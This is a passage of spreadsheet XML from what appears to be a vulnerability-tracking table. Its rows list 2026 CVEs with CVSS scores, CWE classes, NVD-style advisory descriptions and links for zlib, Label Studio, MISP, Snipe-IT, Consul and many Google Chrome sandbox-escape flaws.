      <c r="K1682" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1682" s="5" t="inlineStr">
        <is>
          <t>zlib versions 1.3.1.2 through 1.3.2 contain a heap buffer overflow vulnerability in the gz_vacate() function when processing non-blocking gzwrite() operations with stale external buffer pointers. Attackers can trigger the overflow by calling gzprintf() or gzvprintf() after a write stall, causing an unchecked memmove() to write beyond the internal input buffer boundary.</t>
        </is>
      </c>
      <c r="M1682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85091</t>
        </is>
      </c>
    </row>
    <row r="1683">
      <c r="A1683" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85211</t>
        </is>
      </c>
      <c r="C1683" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1683" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1683" s="5" t="inlineStr"/>
      <c r="F1683" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1683" s="5" t="inlineStr"/>
      <c r="H1683" s="5" t="inlineStr"/>
      <c r="I1683" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1683" s="5" t="inlineStr"/>
      <c r="K1683" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1683" s="5" t="inlineStr">
        <is>
          <t>Label Studio fails to apply organization filters when resolving storage URIs for tasks and projects in proxy_api.py endpoints. Attackers can access other tenants' cloud storage objects by creating a separate organization and supplying arbitrary file URIs to presign or stream bucket contents.</t>
        </is>
      </c>
      <c r="M1683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85211</t>
        </is>
      </c>
    </row>
    <row r="1684">
      <c r="A1684" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85538</t>
        </is>
      </c>
      <c r="C1684" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1684" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1684" s="5" t="inlineStr"/>
      <c r="F1684" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1684" s="5" t="inlineStr"/>
      <c r="H1684" s="5" t="inlineStr"/>
      <c r="I1684" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1684" s="5" t="inlineStr"/>
      <c r="K1684" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1684" s="5" t="inlineStr">
        <is>
          <t>An incorrect authorization vulnerability in MISP allowed authenticated users to delete attributes from events despite lacking the required perm_modify or perm_modify_org permissions.
The affected attribute deletion paths relied on organization membership checks performed by MispAttribute::deleteAttribute() but did not consistently enforce MISP's event modification authorization rules. Consequently, a user belonging to the organization associated with an event could potentially delete individual attributes or perform bulk attribute deletion even when their assigned role was not authorized to modify the event.
This created an inconsistency between attribute editing and deletion: editing an attribute correctly used MISP's ACL::canModifyEvent() authorization logic, whereas the affected deletion operations could bypass these permission checks.
An authenticated attacker with access to an affected MISP instance and membership in the organization owning an event could exploit this flaw to remove attributes from that event, potentially causing unauthorized modification or loss of threat intelligence data.
The patch introduces a common authorization check for all affected deletion paths. Before deletion, MISP now resolves the associated events and verifies that the current user is authorized to modify each event using the same authorization mechanism used by normal event and attribute modification operations.</t>
        </is>
      </c>
      <c r="M1684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85538</t>
        </is>
      </c>
    </row>
    <row r="1685">
      <c r="A1685" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86750</t>
        </is>
      </c>
      <c r="C1685" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1685" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1685" s="5" t="inlineStr"/>
      <c r="F1685" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1685" s="5" t="inlineStr"/>
      <c r="H1685" s="5" t="inlineStr"/>
      <c r="I1685" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1685" s="5" t="inlineStr"/>
      <c r="K1685" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1685" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions &lt;= 8.6.3 (fixed in 8.7.0) do not validate company assignment authorization before persisting user records via the REST API. In Api\UsersController::store() and ::update(), the user record is filled from the request and saved before the requested company_id / company_ids[] values are filtered against the actor's permitted companies (Company::getIdsForCurrentUser()). On installs using Full Multiple Companies Support (FMCS), a non-superuser holding users.create (or users.edit on a target user) can submit company identifiers for companies outside their scope — including a mix of permitted and foreign ids — causing the account row to be committed to the database before authorization is checked. Where null_company_is_floater=1 is set, the post-hoc filter leaves an empty company pivot and the account is persisted as a "floater" with cross-company visibility, allowing creation or relocation of user accounts across tenant boundaries.</t>
        </is>
      </c>
      <c r="M1685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86750</t>
        </is>
      </c>
    </row>
    <row r="1686">
      <c r="A1686" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86771</t>
        </is>
      </c>
      <c r="C1686" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1686" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1686" s="5" t="inlineStr"/>
      <c r="F1686" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1686" s="5" t="inlineStr"/>
      <c r="H1686" s="5" t="inlineStr"/>
      <c r="I1686" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1686" s="5" t="inlineStr"/>
      <c r="K1686" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1686" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to HTML-escape the employee_num field in the acceptance PDF generator, allowing attackers with users.edit permission to inject img tags into TCPDF's writeHTML() function. Attackers can craft a malicious employee_num value containing an img tag with an arbitrary HTTP(S) URL to trigger server-side requests to internal services, cloud metadata endpoints, or external targets when a victim signs an asset acceptance.</t>
        </is>
      </c>
      <c r="M1686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86771</t>
        </is>
      </c>
    </row>
    <row r="1687">
      <c r="A1687" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87034</t>
        </is>
      </c>
      <c r="C1687" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1687" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1687" s="5" t="inlineStr"/>
      <c r="F1687" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1687" s="5" t="inlineStr"/>
      <c r="H1687" s="5" t="inlineStr"/>
      <c r="I1687" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1687" s="5" t="inlineStr"/>
      <c r="K1687" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1687" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M1687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87034</t>
        </is>
      </c>
    </row>
    <row r="1688">
      <c r="A1688" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87090</t>
        </is>
      </c>
      <c r="C1688" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1688" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1688" s="5" t="inlineStr"/>
      <c r="F1688" s="5" t="inlineStr"/>
      <c r="G1688" s="5" t="inlineStr"/>
      <c r="H1688" s="5" t="inlineStr"/>
      <c r="I1688" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1688" s="5" t="inlineStr"/>
      <c r="K1688" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1688" s="5" t="inlineStr">
        <is>
          <t>Consul and Consul Enterprise are vulnerable to an authorization bypass in the catalog node-write path that may allow an authenticated attacker to delete another node's catalog registration and take over its node identity. An attacker with a token granting node-write permission on any single node name may exploit this issue if they can obtain the node ID of a node they do not control. This vulnerability (CVE-2026-87090) is fixed in Consul 2.0.4 and Consul Enterprise 1.21.18, 1.22.12 and 2.0.4.</t>
        </is>
      </c>
      <c r="M1688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87090</t>
        </is>
      </c>
    </row>
    <row r="1689">
      <c r="A1689" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87479</t>
        </is>
      </c>
      <c r="C1689" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1689" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1689" s="5" t="inlineStr"/>
      <c r="F1689" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1689" s="5" t="inlineStr"/>
      <c r="H1689" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1689" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1689" s="5" t="inlineStr"/>
      <c r="K1689" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L1689" s="5" t="inlineStr">
        <is>
          <t>Insufficient policy enforcement in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87479</t>
        </is>
      </c>
    </row>
    <row r="1690">
      <c r="A1690" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87480</t>
        </is>
      </c>
      <c r="C1690" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1690" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1690" s="5" t="inlineStr"/>
      <c r="F1690" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1690" s="5" t="inlineStr"/>
      <c r="H1690" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1690" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1690" s="5" t="inlineStr"/>
      <c r="K1690" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1690" s="5" t="inlineStr">
        <is>
          <t>Use after free in Printing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87480</t>
        </is>
      </c>
    </row>
    <row r="1691">
      <c r="A1691" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87481</t>
        </is>
      </c>
      <c r="C1691" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1691" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1691" s="5" t="inlineStr"/>
      <c r="F1691" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1691" s="5" t="inlineStr"/>
      <c r="H1691" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I1691" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1691" s="5" t="inlineStr"/>
      <c r="K1691" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1691" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87481</t>
        </is>
      </c>
    </row>
    <row r="1692">
      <c r="A1692" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87487</t>
        </is>
      </c>
      <c r="C1692" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1692" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1692" s="5" t="inlineStr"/>
      <c r="F1692" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1692" s="5" t="inlineStr"/>
      <c r="H1692" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1692" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1692" s="5" t="inlineStr"/>
      <c r="K1692" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1692" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87487</t>
        </is>
      </c>
    </row>
    <row r="1693">
      <c r="A1693" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87506</t>
        </is>
      </c>
      <c r="C1693" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1693" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1693" s="5" t="inlineStr"/>
      <c r="F1693" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1693" s="5" t="inlineStr"/>
      <c r="H1693" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1693" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1693" s="5" t="inlineStr"/>
      <c r="K1693" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L1693" s="5" t="inlineStr">
        <is>
          <t>Privilege elevation in WebUI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87506</t>
        </is>
      </c>
    </row>
    <row r="1694">
      <c r="A1694" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87510</t>
        </is>
      </c>
      <c r="C1694" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1694" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1694" s="5" t="inlineStr"/>
      <c r="F1694" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1694" s="5" t="inlineStr"/>
      <c r="H1694" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1694" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1694" s="5" t="inlineStr"/>
      <c r="K1694" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1694" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in FileAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87510</t>
        </is>
      </c>
    </row>
    <row r="1695">
      <c r="A1695" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87524</t>
        </is>
      </c>
      <c r="C1695" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1695" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1695" s="5" t="inlineStr"/>
      <c r="F1695" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1695" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1695" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1695" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1695" s="5" t="inlineStr"/>
      <c r="K1695" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1695" s="5" t="inlineStr">
        <is>
          <t>Use after free in Core in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87524</t>
        </is>
      </c>
    </row>
    <row r="1696">
      <c r="A1696" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87553</t>
        </is>
      </c>
      <c r="C1696" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1696" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1696" s="5" t="inlineStr"/>
      <c r="F1696" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1696" s="5" t="inlineStr"/>
      <c r="H1696" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1696" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1696" s="5" t="inlineStr"/>
      <c r="K1696" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1696" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87553</t>
        </is>
      </c>
    </row>
    <row r="1697">
      <c r="A1697" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87572</t>
        </is>
      </c>
      <c r="C1697" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1697" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1697" s="5" t="inlineStr"/>
      <c r="F1697" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1697" s="5" t="inlineStr"/>
      <c r="H1697" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1697" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1697" s="5" t="inlineStr"/>
      <c r="K1697" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L1697" s="5" t="inlineStr">
        <is>
          <t>Injection in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87572</t>
        </is>
      </c>
    </row>
    <row r="1698">
      <c r="A1698" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87578</t>
        </is>
      </c>
      <c r="C1698" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1698" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1698" s="5" t="inlineStr"/>
      <c r="F1698" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1698" s="5" t="inlineStr"/>
      <c r="H1698" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1698" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1698" s="5" t="inlineStr"/>
      <c r="K1698" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1698" s="5" t="inlineStr">
        <is>
          <t>Use after free in Receiver in Google Chrome prior to 153.0.8010.36 allowed an adjacent attacker to execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87578</t>
        </is>
      </c>
    </row>
    <row r="1699">
      <c r="A1699" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87582</t>
        </is>
      </c>
      <c r="C1699" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1699" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1699" s="5" t="inlineStr"/>
      <c r="F1699" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1699" s="5" t="inlineStr"/>
      <c r="H1699" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1699" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1699" s="5" t="inlineStr"/>
      <c r="K1699" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L1699" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in DataTransfer in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87582</t>
        </is>
      </c>
    </row>
    <row r="1700">
      <c r="A1700" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87604</t>
        </is>
      </c>
      <c r="C1700" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1700" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1700" s="5" t="inlineStr"/>
      <c r="F1700" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1700" s="5" t="inlineStr"/>
      <c r="H1700" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1700" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1700" s="5" t="inlineStr"/>
      <c r="K1700" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1700" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87604</t>
        </is>
      </c>
    </row>
    <row r="1701">
      <c r="A1701" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87616</t>
        </is>
      </c>
      <c r="C1701" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1701" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1701" s="5" t="inlineStr"/>
      <c r="F1701" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1701" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1701" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1701" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1701" s="5" t="inlineStr"/>
      <c r="K1701" s="5" t="inlineStr">
        <is>
          <t>CWE-665</t>
        </is>
      </c>
      <c r="L1701" s="5" t="inlineStr">
        <is>
          <t>Improper initialization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M1701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87616</t>
        </is>
      </c>
    </row>
    <row r="1702">
      <c r="A1702" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87618</t>
        </is>
      </c>
      <c r="C1702" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1702" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1702" s="5" t="inlineStr"/>
      <c r="F1702" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1702" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1702" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1702" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1702" s="5" t="inlineStr"/>
      <c r="K1702" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="L1702" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Storage in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M1702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87618</t>
        </is>
      </c>
    </row>
    <row r="1703">
      <c r="A1703" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87628</t>
        </is>
      </c>
      <c r="C1703" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1703" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1703" s="5" t="inlineStr"/>
      <c r="F1703" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1703" s="5" t="inlineStr"/>
      <c r="H1703" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1703" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1703" s="5" t="inlineStr"/>
      <c r="K1703" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1703" s="5" t="inlineStr">
        <is>
          <t>Use after free in Cast in Google Chrome prior to 153.0.8010.36 allowed an adjacent attacker to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M1703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87628</t>
        </is>
      </c>
    </row>
    <row r="1704">
      <c r="A1704" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1704" s="5" t="inlineStr">
